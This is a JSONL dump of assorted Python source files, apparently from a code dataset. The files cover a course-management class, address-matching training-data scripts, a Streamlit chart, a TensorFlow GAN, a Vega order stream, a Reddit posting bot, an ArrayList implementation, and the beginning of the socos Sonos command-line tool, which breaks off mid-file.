+{"seq_id":"299544200","text":"#!/usr/bin/env python3\n#author:Alnk(李成果)\nimport os\nfrom course_system.core.Basic import Basic\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n\nclass School(Basic):\n '''学校类'''\n def __init__(self):\n pass\n def create_school(self,school_name,school_addr):\n '''创建学校'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/school.json\"):\n school_dict = Basic.read(self,'school.json')\n else:\n school_dict = {}\n school_dict[school_name] = {'addr':school_addr}\n w = Basic()\n w.write(school_dict,'school.json')\n print('学校[%s] 地址[%s] 创建成功!' % (school_name, school_addr))\n def create_course(self,school_name,course_name,course_tuition):\n '''创建课程'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/course.json\"):\n course_dict = Basic.read(self,'course.json')\n else:\n course_dict ={}\n course_dict[course_name] = {'school':school_name,'stution':course_tuition}\n w = Basic()\n w.write(course_dict,'course.json')\n print('[%s]学校的[%s]课程创立成功!' %(school_name,course_name))\n def create_teacher(self,teacher_name,teacher_salary,school_name):\n '''创建老师'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/teacher.json\"):\n teacher_dict = Basic.read(self,'teacher.json')\n else:\n teacher_dict = {}\n teacher_dict[teacher_name] = {'school': school_name,'salary': teacher_salary,}\n Basic.write(self, teacher_dict, 'teacher.json')\n print('[%s]老师雇佣成功'%teacher_name)\n def create_grade(self,school_name,grade_name,course_name,teacher_name):\n '''创建班级'''\n if os.path.isfile(BASE_DIR + \"/course_system/db/grade.json\"):\n grade_dict = Basic.read(self,'grade.json')\n else:\n grade_dict = {}\n grade_dict[grade_name] = {'school':school_name,'course':course_name,'teacher':teacher_name,'student':[]}\n w = Basic()\n w.write(grade_dict,'grade.json')\n print('[%s]班级创建成功'%grade_name)","sub_path":"day06/02作业/course_system/core/School.py","file_name":"School.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"312870773","text":"#!coding=utf8\nimport xlrd\nfrom scipy.optimize import linear_sum_assignment\nimport numpy as np\nimport pandas as pd\nimport pdb\nimport sys\n#import xlrd\n#import jsonload\n#from jsonload import get_kv,loadFont,cal_dis\nfrom function_ultra import utils\nfrom function_ultra.mylog import logger\nimport time\nimport codecs\n\nlogger.debug(\"> start mark\")\nlabelmap = {}\nlabelmap[\"B\"] = 0\nlabelmap[\"I\"] = 1\nlabelmap[\"O\"] = 2\nlabelmap[\"S\"] = 3\n\ndef cost_matrix_value(cost):\n row_ind,col_ind=linear_sum_assignment(cost)\n #print(row_ind)#开销矩阵对应的行索引\n #print(col_ind)#对应行索引的最优指派的列索引\n #print(cost[row_ind,col_ind])#提取每个行索引的最优指派列索引所在的元素,形成数组\n #print(cost[row_ind,col_ind].sum())#数组求和\n return cost[row_ind,col_ind].sum(),row_ind,col_ind\n#for i,j in zip(row_ind, col_ind):\n# print(cost[i,j])\n\n\ndef matrix_build_extract(contl,contr,dct=None,weight=0):\n #ichar_num = [\"一\",\"二\",\"三\",\"四\",\"五\",\"六\",\"七\",\"八\",\"九\",\"零\"]\n #ichar_num.extend([\"栋\",\"单元\",\"层\",\"号\",\"室\",\"户\"])\n ichar_num = [\" \"]\n #pdb.set_trace()\n mat = np.array([1]*len(contl)*len(contr)).reshape(len(contl),len(contr))\n #mulby= (len(contl)-len(contr))**2\n #mulby+=2\n mulby=1\n for i in range(len(contl)):\n ll=1+len(contl)-i\n for j in range(len(contr)):\n lr=1+len(contr)-j\n #if not dct.get('%s_%s'%(contl[i],contr[j]),-1) == -1:\n # mat[i][j]=0\n #if contl[i] in ichar_num or contr[j] in ichar_num:\n # mulby=0\n # mulby=0\n #if False:\n # pass\n #pdb.set_trace()\n #mat[i][j]=(1/len(contl))\n # mat[i][j]=0\n if contl[i]==contr[j]:\n mat[i][j]=0\n else:\n if weight==1:#前面重要\n #mat[i][j]=1*mulby\n mat[i][j]=(ll+lr)*mulby\n elif weight==-1:#后重要\n mat[i][j]=(i+j)*mulby\n #mat[i][j]=(lr*ll*mulby)\n #mat[i][j]=np.log(10+(lr*ll*mulby))\n elif weight==0:\n mat[i][j]=mulby\n else:\n logger.log(\"there is sth wrong\")\n pdb.set_trace()\n assert lr>0\n assert ll>0\n return mat\n\ndef matrix_build(contl,contr,dct=None,weight=0):\n ichar_num = [\" \"]\n mat = np.array([1]*len(contl)*len(contr)).reshape(len(contl),len(contr))\n mulby=1\n for i in range(len(contl)):\n ll=1+len(contl)-i\n for j in range(len(contr)):\n lr=1+len(contr)-j\n if not dct.get('%s_%s'%(contl[i],contr[j]),-1) == -1:\n mat[i][j]=0\n else:\n if weight==1:#前面重要\n mat[i][j]=(ll+lr)*mulby\n elif weight==-1:#后重要\n mat[i][j]=(i+j)*mulby\n elif weight==0:\n mat[i][j]=mulby\n else:\n logger.log(\"there is sth wrong\")\n pdb.set_trace()\n assert lr>0\n assert ll>0\n return mat\n\ndef hugry_match(mat,k1s,k2s):\n s,r,c = cost_matrix_value(mat)\n data = []\n label = []\n match = []\n for i,j in zip(r,c):\n if k1s[i]==k2s[j]:\n match.append(j)\n else:\n pass\n for i in range(len(k2s)):\n if i in match:\n data.append(k2s[i])\n label.append(labelmap[\"I\"])\n else:\n data.append(k2s[i])\n label.append(labelmap[\"O\"])\n return data,label,s,r,c\n\ndef read_txt(filename,shuffle):\n lines = codecs.open(filename,\"r\",\"utf-8\").readlines()\n for line in lines:\n if shuffle:\n line = lines[np.random.randint(len(lines))]\n line = line.split(\"&\")[0]\n line = utils.clr(line)\n yield line\n\n'''\ndef mark_from_txt_compare(filename):\n gen = read_txt(filename)\n _gen = read_txt(filename)\n for i in gen:\n for j in _gen:\n if i == j:\n continue\n elif len(i)>len(j):\n data, label,s,r,c = hugry_match(matrix_build(i,j),i,j)\n yield (data,label)\n else:\n data, label,s,r,c = hugry_match(matrix_build(j,i),j,i)\n yield (data,label)\n'''\ndef show_match(filename):\n cnt = 100\n with open(\"match_sample.txt\",\"r\") as f:\n lines = f.readlines()\n for line in lines:\n kv = line.split(\"\\t\")\n pas = \"\"\n for i,j in zip(kv[0],kv[1]):\n if j == \"1\":\n pas+=i\n else:\n pas+=\"_\"\n cnt-=1\n if cnt<0:\n time.sleep(0.2)\n cnt=100\n\ndef read_xlrd(filename):\n ad = xlrd.open_workbook(filename)\n sts = ad.sheets()\n rows = sts[0].get_rows()\n result = []\n for line in rows:\n k = line[14].value\n v = line[10].value\n k = utils.clr(k)\n v = utils.clr(v)\n data,label,s,r,c= hugry_match(matrix_build(k,v),k,v)\n yield (data,label,k,v)\n\ndef addr_classifier(k,v,dct,direct):\n data,label,s,r,c= hugry_match(matrix_build(k,v,dct,direct),k,v)\n return data,label,s,r,c\n\ndef init_ner_train_data(filename):\n gen = read_txt(filename,shuffle=True)\n f = open(filename,\"a+\")\n for sent in gen:\n sent = utils.clr(sent)\n for char in sent:\n f.write(\"%s O\\n\"%char)\n f.write(\"\\n\")\n f.close()\n\ndef sent_pair_gen(filename):\n with open(filename, \"a+\") as gh:\n gen = read_xlrd(\"/home/dell/data/addr_guiyang_zhongtian_huayuan.xlsx\")\n for i in gen:\n k = i[2]\n v = i[3]\n gh.write(\"%s %s\\n\"%(k,v))\n gh.flush()\nimport re\n\ndef seperate_zhengz_address(filename):\n rt = open(\"/home/dell/data/zhengz_train.txt\",\"w+\")\n wx = open(\"/home/dell/data/zhengz_dev.txt\",\"w+\")\n tmp = []\n with open(filename) as f:\n lines = f.readlines()\n for line in lines:\n line = re.sub(\"[\\r\\n]\",\"\",line)\n line = re.sub(\"NONE\",\"\",line)\n line = re.sub(\" \",\"\",line)\n line = utils.clr(line)\n if 'ROOT' in line:\n qua,ans = line.split('ROOT')\n rt.write(\"%s %s 0\\n\"%(qua,ans))\n else:\n if len(tmp) == 2:\n rt.write(\"%s %s 1\\n\"%(tmp[0],tmp[1]))\n tmp = []\n else:\n tmp.append(line)\n rt.close()\n wx.close()\n\n\ndef zhengz_train_data_gen_sent_pairs():\n standf = '/home/dell/data/zz_std_words.txt'\n samplef = '/home/dell/data/eval_zz.txt'\n filename = \"/home/dell/data/zhengz_comp.txt\"\n stand = read_txt(standf,shuffle=True)\n sampl = read_txt(samplef,shuffle=True)\n cont = open(filename,\"w+\")\n index = 0\n for lstd in stand:\n for lsam in sampl:\n cont.write('%s %s\\n'%(lstd,lsam))\n index+=1\n if index>1000000:\n break\n stand.close()\n sampl.close()\n cont.close()\n\ndef train_data_gen_sent_pairs(filename,writeintrain,writeintest):\n with open(writeintrain,\"w+\") as g:\n with open(writeintest,\"w+\") as h:\n with open(filename,\"r\") as f:\n lines = f.readlines()\n sep = int(len(lines)*0.9//1)\n for line in lines[:sep]:\n line = re.sub(\"[\\r\\n]\",\"\",line)\n sent_a, sent_b = line.split(\" \")\n g.write(\"%s %s 0\\n\"%(sent_a,sent_b))\n cnt = np.random.randint(len(lines))\n g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n g.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n\n for line in lines[sep:]:\n line = re.sub(\"[\\r\\n]\",\"\",line)\n sent_a, sent_b = line.split(\" \")\n h.write(\"%s %s 0\\n\"%(sent_a,sent_b))\n cnt = np.random.randint(len(lines))\n h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n\n\n\nif __name__ == \"__main__\":\n #sent_pair_gen(\"./sent_pair_word.txt\")\n #zhengz_train_data_gen_sent_pairs()\n #pdb.set_trace()\n #seperate_zhengz_address(\"/home/dell/data/output_zz.txt\")\n\n #train_data_gen_sent_pairs(\"/home/dell/data/sent_pair_word.txt\",\"/home/dell/data/example_train_sentpair_zhongtianhuayuan\", \\\n #\"/home/dell/data/example_test_sentpair_zhongtianhuayuan\")\n #gen = read_xlrd(\"data/addr_guiyang_zhongtian_huayuan.xlsx\")\n #for i in gen:\n # print(i)\n #filename = sys.argv[1]\n #init_ner_train_data(filename)\n with open(\"match_sample_reverse.txt\",\"a+\") as gh:\n #gen = mark_from_txt_compare(\"/data/network_zz/output/doc_pre_handle.txt\")\n gen = read_xlrd(\"/home/dell/data/addr_guiyang_zhongtian_huayuan.xlsx\")\n print(gen)\n for i in gen:\n print(i)\n k = \"\".join(i[0])\n v = \"\".join([str(_) for _ in i[1]])\n for ii,jj in zip(k,v):\n gh.write(\"%s %s\\n\"%(ii,jj))\n gh.write(\"\\n\")\n gh.flush()\n #if \"1\" in \"\".join([str(_) for _ in i[1]]):\n # pdb.set_trace()\n\n","sub_path":"yunyan_baotou/src/business_ultra/mark_train_data.py","file_name":"mark_train_data.py","file_ext":"py","file_size_in_byte":9605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"355489025","text":"\"\"\"\nDisplay graphs of the data\n\"\"\"\n\nimport streamlit as st\nfrom facebook.data.fetch_from_api import get_fb_posts\n\n\ndef display_facebook():\n \"\"\"\n Display Facebook posts data\n \"\"\"\n fb_posts = get_fb_posts()\n st.header(\"Facebook posts\")\n st.write(fb_posts)\n st.subheader(\"Total likes\")\n st.line_chart(data=fb_posts['statistics.actual.likeCount'])\n","sub_path":"facebook/visualizations/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"94995609","text":"from functools import partial\nimport tensorflow as tf\nimport neural_nets.nn as nn\n\nclass SimpleGan:\n\n def __init__(self,\n crop_size=100,\n lr=.0001,\n wasserstein=False):\n\n #\"\"\" graph \"\"\"\n # resnet_model\n self.generator = partial(nn.generator, scope='generator')\n self.discriminator = partial(nn.discriminator, scope='discriminator')\n\n\n # Placeholders\n self.real = tf.placeholder(tf.float32, shape=[None, crop_size, crop_size, 3])\n self.noise = tf.placeholder(tf.float32, shape=[None, crop_size, crop_size, 3])\n\n # Generator outputs\n self.generator_output = self.generator(self.noise)\n\n # Discriminator outputs\n self.discriminator_output_real = self.discriminator(self.real)\n self.discriminator_output_fake = self.discriminator(self.generator_output)\n\n if wasserstein:\n self.d_loss = tf.reduce_mean(self.discriminator_output_fake) - tf.reduce_mean(self.discriminator_output_real)\n self.g_loss = -tf.reduce_mean(self.discriminator_output_fake)\n\n else:\n # Generator loss\n self.g_loss = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_fake, multi_class_labels=tf.ones_like(self.discriminator_output_fake))\n\n # Discriminator loss\n self.d_loss_real = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_real, multi_class_labels=tf.ones_like(self.discriminator_output_real))\n self.d_loss_fake = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_fake, multi_class_labels=tf.zeros_like(self.discriminator_output_fake))\n self.d_loss = self.d_loss_real + self.d_loss_fake\n\n\n # Optimization\n t_var = tf.trainable_variables()\n d_var = [var for var in t_var if 'discriminator' in var.name]\n g_var = [var for var in t_var if 'generator' in var.name]\n\n self.d_train_op = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(self.d_loss, var_list=d_var)\n self.g_train_op = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(self.g_loss, var_list=g_var)\n\n\n # \"\"\" train \"\"\"\n # ''' init '''\n # session\n config = tf.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n self.sess = tf.Session(config=config)\n\n self.init_op = tf.global_variables_initializer()\n self.sess.run(self.init_op)\n\n #''' saver '''\n self.saver = tf.train.Saver(max_to_keep=None)","sub_path":"neural_nets/simple_gan.py","file_name":"simple_gan.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"241422545","text":"#!/usr/bin/python3\n\n\"\"\"\nScript language: Python3\n\nTalks to:\n- Vega node (gRPC)\n\nApps/Libraries:\n- gRPC (node): Vega-API-client (https://pypi.org/project/Vega-API-client/)\n\"\"\"\n\n# Note: this file uses smart-tags in comments to section parts of the code to\n# show them as snippets in our documentation. They are not necessary to be\n# included when creating your own custom code.\n#\n# Example of smart-tags:\n# __something:\n# some code here\n# :something__\n\nimport os\nimport signal\nimport sys\n\n# __import_client:\nimport vegaapiclient as vac\n# :import_client__\n\nnode_url_grpc = os.getenv(\"NODE_URL_GRPC\")\n\ndef signal_handler(sig, frame):\n print('Exit requested.')\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n# __create_client:\n# Create a Vega gRPC data client\ndata_client = vac.VegaTradingDataClient(node_url_grpc)\n# :create_client__\n\n# __find_market:\n# Get a list of markets, and select the first market returned\nmarkets = data_client.Markets(vac.api.trading.MarketsRequest()).markets\nmarket_id = markets[0].id\n# :find_market__\n\n# __stream_orders:\n# Subscribe to the Orders stream for the marketID specified\n# Optional: Market identifier - filter by market\n# Party identifier - filter by party\n# By default, all orders on all markets for all parties will be returned on the stream.\nsubscribe_request = vac.api.trading.OrdersSubscribeRequest(market_id=market_id)\nfor stream_resp in data_client.OrdersSubscribe(subscribe_request):\n for order in stream_resp.orders:\n # All orders arriving over the channel/stream will be printed\n print(order)\n# :stream_orders__\n","sub_path":"stream-orders-and-trades/stream-orders-with-Vega-API-client.py","file_name":"stream-orders-with-Vega-API-client.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"247570126","text":"import praw\r\nimport time\r\n\r\n\r\ndef main():\r\n posttopfifty()\r\n postlog()\r\n\r\ndef posttopfifty():\r\n topfifty = \"Post# | Title | Subreddit | Url | Upvotes \\n ---|---|---|----|---- \\n\"\r\n counter = 1\r\n for submission in reddit.subreddit('all').top('day', limit=50):\r\n topfifty += \"{} | {} | /r/{} | [link]({}) | {} \\n\".format(counter, submission.title, submission.subreddit,\r\n submission.url, submission.score)\r\n counter += 1\r\n reddit.subreddit('GraxPy').submit(time.strftime('%m/%d/%y'), topfifty)\r\n print('posted')\r\n\r\n\r\ndef postlog():\r\n f = open(r'C:\\Users\\Wilson\\desktop\\python.txt', 'w')\r\n f.write('Posted to reddit: {}\\n'.format(time.strftime('%x %X')))\r\n f.close()\r\n\r\nif __name__ == '__main__':\r\n reddit = praw.Reddit('bot')\r\n main()\r\n","sub_path":"GraxPyPost.py","file_name":"GraxPyPost.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"463772432","text":"# An ArrayList is one of\r\n# - None\r\n# - ArrayList(array, int, int)\r\nclass ArrayList:\r\n def __init__(self, array, size, capacity=10):\r\n if array == [None] or array is None:\r\n self.array = [None] * capacity\r\n else:\r\n self.array = array\r\n self.size = size\r\n self.capacity = capacity\r\n\r\n def __eq__(self, other):\r\n return ((type(other) == ArrayList)\r\n and self.array == other.array\r\n and self.size == other.size\r\n and self.capacity == other.capacity\r\n )\r\n\r\n def __repr__(self):\r\n return \"ArrayList({!r}, {!r}, {!r})\".format(self.array, self.size, self.capacity)\r\n\r\n\r\n# None -> ArrayList\r\n# Returns an empty ArrayList\r\ndef empty_list():\r\n return ArrayList([None], 0)\r\n\r\n\r\n# ArrayList int value -> ArrayList\r\n# Takes an ArrayList, an index, and a value, places the value at the given index in the list, and returns it\r\ndef add(array, index, value):\r\n if array.size == array.capacity:\r\n array = double_capacity(array)\r\n\r\n if index > array.size or index < 0:\r\n raise IndexError\r\n else:\r\n for i in range(array.size - 1, index - 1, -1):\r\n array.array[i + 1] = array.array[i]\r\n array.array[index] = value\r\n array.size += 1\r\n return array\r\n\r\n\r\n# ArrayList -> ArrayList\r\n# Doubles the capacity of an ArrayList\r\ndef double_capacity(array):\r\n double = ArrayList([None], array.size, array.capacity * 2)\r\n for i in range(array.size):\r\n double.array[i] = array.array[i]\r\n return double\r\n\r\n\r\n# ArrayList -> int\r\n# Takes an ArrayList and returns the number of elements in the list\r\ndef length(array):\r\n return array.size\r\n\r\n\r\n# ArrayList int -> value\r\n# Takes an ArrayList and an index and returns the value at the given index\r\ndef get(array, index):\r\n if index >= array.size or index < 0:\r\n raise IndexError\r\n else:\r\n return array.array[index]\r\n\r\n\r\n# ArrayList int value -> AnyList\r\n# Takes an ArrayList, an index, and a value and replaces the element at the index in the list with the given value\r\ndef set(array, index, value):\r\n if index >= array.size or index < 0:\r\n raise IndexError\r\n else:\r\n array.array[index] = value\r\n return array\r\n\r\n\r\n# ArrayList int -> (value, ArrayList)\r\n# Takes an ArrayList and an index and removes the element at the index, returning the removed element and resulting list\r\ndef remove(array, index):\r\n if index >= array.size or index < 0:\r\n raise IndexError\r\n else:\r\n num = array.array[index]\r\n for i in range(index + 1, array.size):\r\n array.array[i - 1] = array.array[i]\r\n array.array[array.size - 1] = None\r\n array.size -= 1\r\n return num, array\r\n","sub_path":"Projects/project-3-gmonteir/array_list.py","file_name":"array_list.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"309102035","text":"#!/usr/bin/env python\n\n\"\"\" socos is a commandline tool for controlling Sonos speakers \"\"\"\n\nfrom __future__ import print_function\n\n\n# Will be parsed by setup.py to determine package metadata\n__author__ = 'SoCo team '\n__version__ = '0.1'\n__website__ = 'https://github.com/SoCo/socos'\n__license__ = 'MIT License'\n\n\nimport sys\nimport os\nfrom collections import OrderedDict\nimport sqlite3\nimport json\nimport shlex\n\ntry:\n # pylint: disable=import-error\n import colorama\nexcept ImportError:\n # pylint: disable=invalid-name\n colorama = None\n\ntry:\n import readline\nexcept ImportError:\n # pylint: disable=invalid-name\n readline = None\n\ntry:\n # pylint: disable=redefined-builtin,invalid-name,undefined-variable\n input = raw_input\nexcept NameError:\n # raw_input has been renamed to input in Python 3\n pass\n\nimport soco\nfrom soco.data_structures import MLTrack, MLAlbum, MLArtist, MLPlaylist\n\n\nclass MusicLibrary(object):\n \"\"\"Class that implements the music library support for socos\"\"\"\n\n def __init__(self):\n # Sqlite3 variables\n self.connection = None\n self.cursor = None\n # As a simple opitmization we cache 10 searches\n self.cached_searches = OrderedDict()\n self.cache_length = 10\n # Date type and tables names\n self.data_types = ['playlists', 'artists', 'albums', 'tracks']\n\n def _open_db(self):\n \"\"\"Open a connection to the sqlite3 database and if necessary create\n the the folders and path for it. The file will be saved to:\n USERPATH/.config/socos/musiclib.db where USERPATH is as returned by\n os.path.expanduser\n \"\"\"\n if not self.connection:\n userdir = os.path.expanduser('~')\n dbdir = os.path.join(userdir, '.config', 'socos')\n if not os.path.exists(dbdir):\n os.makedirs(dbdir)\n yield 'Created folder: \\'{}\\''.format(dbdir)\n\n dbpath = os.path.join(dbdir, 'musiclib.db')\n if not os.path.exists(dbpath):\n yield 'Created Sqlite3 database for music library '\\\n 'information at: \\'{}\\''.format(dbpath)\n self.connection = sqlite3.connect(dbpath)\n self.cursor = self.connection.cursor()\n\n def index(self, sonos):\n \"\"\"Update the index of the music library information\"\"\"\n for string in self._open_db():\n yield string\n # Drop old tables\n query = 'SELECT name FROM sqlite_master WHERE type = \"table\"'\n self.cursor.execute(query)\n number_of_tables = len(self.cursor.fetchall())\n if number_of_tables == 4:\n yield 'Deleting tables'\n query = 'DROP TABLE {}'\n for table_name in self.data_types:\n self.cursor.execute(query.format(table_name))\n self.connection.commit()\n\n # Form new tables\n yield 'Creating tables'\n create_statements = [\n 'CREATE TABLE tracks (title text, album text, artist text, '\n 'content text)',\n 'CREATE TABLE albums (title text, artist text, content text)',\n 'CREATE TABLE artists (title text, content text)',\n 'CREATE TABLE playlists (title text, content text)',\n ]\n for create in create_statements:\n self.cursor.execute(create)\n self.connection.commit()\n\n # Index the 4 different types of data\n for data_type in self.data_types:\n for string in self._index_single_type(sonos, data_type):\n yield string\n\n def _index_single_type(self, sonos, data_type):\n \"\"\"Index a single type if data\"\"\"\n fields = self._get_columns(data_type)\n # Artist is called creator in the UPnP data structures\n if 'artist' in fields:\n fields[fields.index('artist')] = 'creator'\n\n # E.g: INSERT INTO tracks VALUES (?,?,?,?)\n query = 'INSERT INTO {} VALUES ({})'.format(\n data_type, ','.join(['?'] * len(fields)))\n\n # For brevity\n get_ml_inf = sonos.get_music_library_information\n\n total = get_ml_inf(data_type, 0, 1)['total_matches']\n yield 'Adding: {}'.format(data_type)\n count = 0\n while count < total:\n # Get as many matches as the device will give each time\n search = get_ml_inf(data_type, start=count, max_items=1000)\n for item in search['item_list']:\n # In the database we save a set of text fields and the content\n # dict as json. See self.index for details on fields.\n values = [getattr(item, field) for field in\n fields[:-1]]\n values.append(json.dumps(item.to_dict))\n self.cursor.execute(query, values)\n self.connection.commit()\n\n # Print out status while running because indexing tracks can take a\n # while\n count += search['number_returned']\n yield '{{: >3}}% {{: >{0}}} out of {{: >{0}}}'\\\n .format(len(str(total)))\\\n .format(count * 100 / total, count, total)\n\n def _get_columns(self, table):\n \"\"\"Return the names of the columns in the table\"\"\"\n query = 'PRAGMA table_info({})'.format(table)\n self.cursor.execute(query)\n # The table descriptions look like: (0, u'title', u'text', 0, None, 0)\n return [element[1] for element in self.cursor.fetchall()]\n\n def tracks(self, sonos, *args):\n \"\"\"Search for and possibly play tracks from the music library\n\n Usage: ml_tracks [field=]text [action] [number]\n\n Field can be 'title', 'album' or 'artist'. If field is not given, then\n 'title' is used. Only a single word can be used as search text. Action\n can be 'add' or 'replace' and number refers to the item number in the\n search results.\n\n Examples:\n ml_tracks artist=metallica\n ml_tracks unforgiven\n ml_tracks unforgiven add 4\n \"\"\"\n for string in self._search_and_play(sonos, 'tracks', *args):\n yield string\n\n def albums(self, sonos, *args):\n \"\"\"Search for and possibly play albums from the music library\n\n Usage: ml_albums [field=]text [action] [number]\n\n Field can be 'title' or 'artist'. If field is not given, then 'title'\n is used. Only a single word can be used as search text. Action can be\n 'add' or 'replace' and number refers to the item number in the search\n results.\n\n Examples:\n ml_albums artist=metallica\n ml_albums black\n ml_albums black add 1\n \"\"\"\n for string in self._search_and_play(sonos, 'albums', *args):\n yield string\n\n def artists(self, sonos, *args):\n \"\"\"Search for and possibly play all by artists from music library\n\n Usage: ml_artists text [action] [number]\n\n 'text' is searched for in the artist titles. Only a single word can '\\\n 'be used as search text. Action can be 'add' or 'replace' and number '\\\n 'refers to the item number in the search results.\n\n Examples:\n ml_artists metallica\n ml_artists metallica add 1\n \"\"\"\n for string in self._search_and_play(sonos, 'artists', *args):\n yield string\n\n def playlists(self, sonos, *args):\n \"\"\"Search for and possibly play playlists imported in the music library\n\n Usage: ml_playlists text [action] [number]\n\n 'text' is searched for in the playlist titles. Only a single word '\\\n 'can be used as search text. Action can be 'add' or 'replace' and '\\\n 'number refers to the item number in the search results.\n\n Examples:\n ml_playlist metallica\n ml_playlist metallica add 3\n \"\"\"\n for string in self._search_and_play(sonos, 'playlists', *args):\n yield string\n\n def _search_and_play(self, sonos, data_type, *args):\n \"\"\"Perform a music library search and possibly play and item\"\"\"\n # Open the data base\n for string in self._open_db():\n yield string\n\n # Check if the music library has been indexed\n query = 'SELECT name FROM sqlite_master WHERE type = \"table\"'\n self.cursor.execute(query)\n if len(self.cursor.fetchall()) != 4:\n message = 'Your music library cannot be search until it has been '\\\n 'indexed. First run \\'ml_index\\''\n raise TypeError(message)\n # Check if there is a search term\n if len(args) < 1:\n message = 'Search term missing. See \\'help ml_{}\\' for details'.\\\n format(data_type)\n raise TypeError(message)\n\n # And finally perform the search\n results = self._search(data_type, *args)\n\n # If there are no other arguments then the search\n if len(args) == 1:\n for string in self._print_results(data_type, results):\n yield string\n # Or if there are the right number for a play command\n elif len(args) == 3:\n yield self._play(sonos, data_type, results, *args)\n # Else give error\n else:\n message = 'Incorrect play syntax: See \\'help ml_{}\\' for details'.\\\n format(data_type)\n raise TypeError(message)\n\n def _search(self, data_type, *args):\n \"\"\"Perform the search\"\"\"\n # Process search term\n search_string = args[0]\n if search_string.count('=') == 0:\n field = 'title'\n search = search_string\n elif search_string.count('=') == 1:\n field, search = search_string.split('=')\n else:\n message = '= signs are not allowed in the search string'\n raise TypeError(message)\n\n # Pad the search term with SQL LIKE wild cards\n search = search.join(['%', '%'])\n # Do the search, if it has not been cached\n if (data_type, field, search) in self.cached_searches:\n results = self.cached_searches[(data_type, field, search)]\n else:\n if field in self._get_columns(data_type)[:-1]:\n # Perform the search in Sqlite3\n query = 'SELECT * FROM {} WHERE {} LIKE ?'.format(data_type,\n field)\n try:\n search = search.decode('utf-8')\n except AttributeError:\n pass\n self.cursor.execute(query, [search])\n results = self.cursor.fetchall()\n # Add results to the cache and reduce cache length if necesary\n self.cached_searches[(data_type, field, search)] = results\n while len(self.cached_searches) > self.cache_length:\n self.cached_searches.popitem(last=False)\n else:\n message = 'The search field \\'{}\\' is unknown. Only {} is '\\\n 'allowed'.format(field, self._get_columns(data_type)[:-1])\n raise TypeError(message)\n return results\n\n @staticmethod\n def _play(sonos, data_type, results, *args):\n \"\"\"Play music library item from search\"\"\"\n action, number = args[1:]\n # Check action\n if action not in ['add', 'replace']:\n message = 'Action must be \\'add\\' or \\'replace\\''\n raise TypeError(message)\n\n # Convert and check number\n try:\n number = int(number) - 1\n except ValueError:\n raise TypeError('Play number must be parseable as integer')\n if number not in range(len(results)):\n if len(results) == 0:\n message = 'No results to play from'\n elif len(results) == 1:\n message = 'Play number can only be 1'\n else:\n message = 'Play number has to be in the range from 1 to {}'.\\\n format(len(results))\n raise TypeError(message)\n\n # The last item in the search is the content dict in json\n item_dict = json.loads(results[number][-1])\n ml_classes = {'tracks': MLTrack, 'albums': MLAlbum,\n 'artists': MLArtist, 'playlists': MLPlaylist}\n item = ml_classes[data_type].from_dict(item_dict)\n\n # Save state before queue manipulation\n player_state = state(sonos)\n out = 'Added to queue: \\'{}\\''\n if action == 'replace':\n sonos.clear_queue()\n out = 'Queue replaced with: \\'{}\\''\n sonos.add_to_queue(item)\n if action == 'replace' and player_state == 'PLAYING':\n sonos.play()\n\n title = item.title\n if hasattr(title, 'decode'):\n title = title.encode('utf-8')\n return out.format(title)\n\n @staticmethod\n def _print_results(data_type, results):\n \"\"\"Print the results out nicely\"\"\"\n print_patterns = {\n u'tracks': '\\'{title}\\' on \\'{album}\\' by \\'{creator}\\'',\n u'albums': '\\'{title}\\' by \\'{creator}\\'',\n u'artists': '\\'{title}\\'',\n u'playlists': '\\'{title}\\''\n }\n # Length of the results length number\n index_length = len(str(len(results)))\n for index, item in enumerate(results):\n item_dict = json.loads(item[-1])\n for key, value in item_dict.items():\n if hasattr(value, 'decode'):\n item_dict[key] = value.encode('utf-8')\n number = '({{: >{}}}) '.format(index_length).format(index + 1)\n # pylint: disable=star-args\n yield number + print_patterns[data_type].format(**item_dict)\n\n\n# current speaker (used only in interactive mode)\nCUR_SPEAKER = None\n# Instance of music library class\nMUSIC_LIB = MusicLibrary()\n\n\ndef main():\n \"\"\" main switches between (non-)interactive mode \"\"\"\n args = sys.argv[1:]\n\n if args:\n # process command and exit\n process_cmd(args)\n else:\n # start interactive shell\n shell()\n\n\ndef process_cmd(args):\n \"\"\" Processes a single command \"\"\"\n\n cmd = args.pop(0).lower()\n\n if cmd not in COMMANDS:\n err('Unknown command \"{cmd}\"'.format(cmd=cmd))\n err(get_help())\n return False\n\n func, 